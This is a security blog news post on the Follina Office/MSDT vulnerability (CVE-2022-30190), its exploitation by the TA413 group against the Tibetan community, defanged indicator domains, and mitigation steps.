Let me remind you that the discovery of Follina became known a few days ago, although the first researchers discovered the bug back in April 2022, but then Microsoft refused to acknowledge the problem. The vulnerability is now tracked as CVE-2022-30190 and is known to be exploitable through normal Word document opening or File Explorer preview, using malicious PowerShell commands through the Microsoft Diagnostic Tool (MSDT) to execute.

The bug affects all versions of Windows that receive security updates, that is, Windows 7 and later, as well as Server 2008 and later.

Let me remind you that we also wrote that Lapsus$ hack group stole the source codes of Microsoft products.

Previously, experts have already reported that the discovery of Follina is a very worrying signal, as the vulnerability opens up a new attack vector using Microsoft Office. The fact is that the bug works without elevated privileges, allows bypassing Windows Defender and does not require the activation of macros to execute binaries or scripts.

As Proofpoint experts now say, the Chinese “government” hackers from the TA413 group have already taken advantage of the Follina problem, targeting their attacks on the international Tibetan community.

Follina 0-day vulnerability

Attackers distribute ZIP archives to victims that contain malicious Word documents designed to attack CVE-2022-30190. The decoys are disguised as messages from the Central Tibetan Administration and use the tibet-gov.web[.]app domain.

Well-known information security researcher MalwareHunterTeam also writes that he found DOCX documents with file names in Chinese that are used to deliver malicious payloads through the http://coolrat[.]xyz domain, including malware to steal passwords.

Since there is no patch for Follina yet, administrators and users can block attacks on CVE-2022-30190 by disabling the MSDT URI protocol, which attackers use to launch debuggers and execute code on vulnerable systems. It is also recommended to disable file preview in Windows Explorer, because the attack is possible in this way as well.

The post Chinese Hackers Attack Fresh 0-day Follina Vulnerability appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/follina-0-day-vulnerability/feed/ 0 8270